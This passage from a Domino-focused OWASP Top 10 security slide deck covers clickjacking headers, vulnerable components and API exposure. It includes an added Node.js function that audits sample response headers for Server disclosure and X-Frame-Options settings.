    • Set header - (note required for PCI compliance)
      http://www-01.ibm.com/support/docview.wss?uid=swg21568598
    HG
  • 39. A8 – X-Frame-Options Header
    • Use the header “X-Frame-Options” to tell browsers not to allow your page to be loaded in someone else’s frame
      – Frequently required by customer security audits
    AP
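A response-header audit covering two points from this deck: the product-revealing Server header from slides 29 and 30 (HTTPDisableServerHeader=1, or a replacement value) and the X-Frame-Options header from slides 38 and 39. It is an added Node.js example, not code from the deck or from Domino; the two header sets are constructed samples of a default and a hardened response, and "Lotus-Domino" is assumed to be the default Server value.

```javascript
// Added example (not from the MWLUG deck): audit a response's headers for the
// A5 "don't help the hackers" and A8 "X-Frame-Options" points. The header
// objects are constructed samples, not captured from a real server.

// Returns a list of findings (empty means the two checks pass) so the function
// can be run over headers obtained any way you like, e.g. the `res.headers`
// object of an https.request() against your own server.
function auditHeaders(headers) {
  // Header names are case-insensitive; normalise before looking anything up.
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = String(value);
  const findings = [];

  // A5: product and version disclosure. A Server value naming the product, or
  // carrying a version number, is what the "please hack me" slide is about.
  const server = h['server'];
  if (server !== undefined) {
    if (/domino/i.test(server)) findings.push('Server header discloses product: ' + server);
    if (/\d+\.\d+/.test(server)) findings.push('Server header discloses a version: ' + server);
  }

  // A8: framing. DENY or SAMEORIGIN are the values browsers honour; ALLOW-FROM
  // is obsolete, and a missing header leaves the page frameable by any site.
  const xfo = h['x-frame-options'];
  if (xfo === undefined) {
    findings.push('X-Frame-Options missing');
  } else if (!/^(deny|sameorigin)$/i.test(xfo.trim())) {
    findings.push('X-Frame-Options has a weak or obsolete value: ' + xfo);
  }
  return findings;
}

// Constructed "before": what a default install is assumed to send.
const defaultHeaders = { 'Server': 'Lotus-Domino', 'Content-Type': 'text/html' };
// Constructed "after": HTTPDisableServerHeader=1 plus a custom Server value and
// X-Frame-Options set as on slide 39.
const hardenedHeaders = { 'server': 'MyCompany Web', 'content-type': 'text/html',
                          'X-Frame-Options': 'SAMEORIGIN' };

console.log('default :', auditHeaders(defaultHeaders));
console.log('hardened:', auditHeaders(hardenedHeaders));
```

Because the check is a pure function of the header object, it drops straight into a scheduled job that requests a few pages from each server and fails the run when the findings list is non-empty, which is the cheap way to keep the customer audits mentioned on the slide from being surprised.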
  • 40. A9 - Using Components with Known Vulnerabilities
    • The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like CVE and NVD.
    • Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague.
    HG
  • 41. Domino Vulnerabilities – A9
    • What software is your application using? Does that have vulnerabilities?
      – JS libraries like jQuery, Select2
      – Java libraries (pdf, JSON, credit card...)
    • What software is IBM using? (Example Java libraries, Apache Struts, etc.)
      – Example: Apache Struts vulnerability
      – Be sure to keep the Domino JVM updated
      – Interim fixes
      – Latest Fix Pack
    HG
  • 42. A10 – Under-protected APIs
    Am I Vulnerable to Attack?
    Testing your APIs for vulnerabilities should be similar to testing the rest of your application for vulnerabilities. All the different types of injection, authentication, access control, encryption, configuration, and other issues can exist in APIs just as in a traditional application.
    However, because APIs are designed for use by programs (not humans) they frequently lack a UI and also use complex protocols and complex data structures. These factors can make security testing difficult. The use of widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and XML. Some frameworks like GWT and some RPC implementations use custom formats. Some applications and APIs create their own protocol and data formats, like WebSockets. The breadth and complexity of APIs make it difficult to automate effective security testing, possibly leading to a false sense of security.
    Ultimately, knowing if your APIs are secure means carefully choosing a strategy to test all defenses that matter.
    HG
  • 43. Domino Vulnerabilities – A10
    • Know what is turned on in your applications and server.
      – Is Domino DAS turned on?
        • REST access to a database
      – XPages REST, agents that serve up REST data, etc.
    • Do a code review, understand what data these might serve up and how much access is given.
    HG
  • 44. Closing
    • Security is the responsibility of EVERYONE
    • Especially those of us in IT, even without a security job
      – Developers have to ALWAYS design for security
      – Admins have to ALWAYS plan and monitor to build resilient systems
      – Management has to provide the resources and focus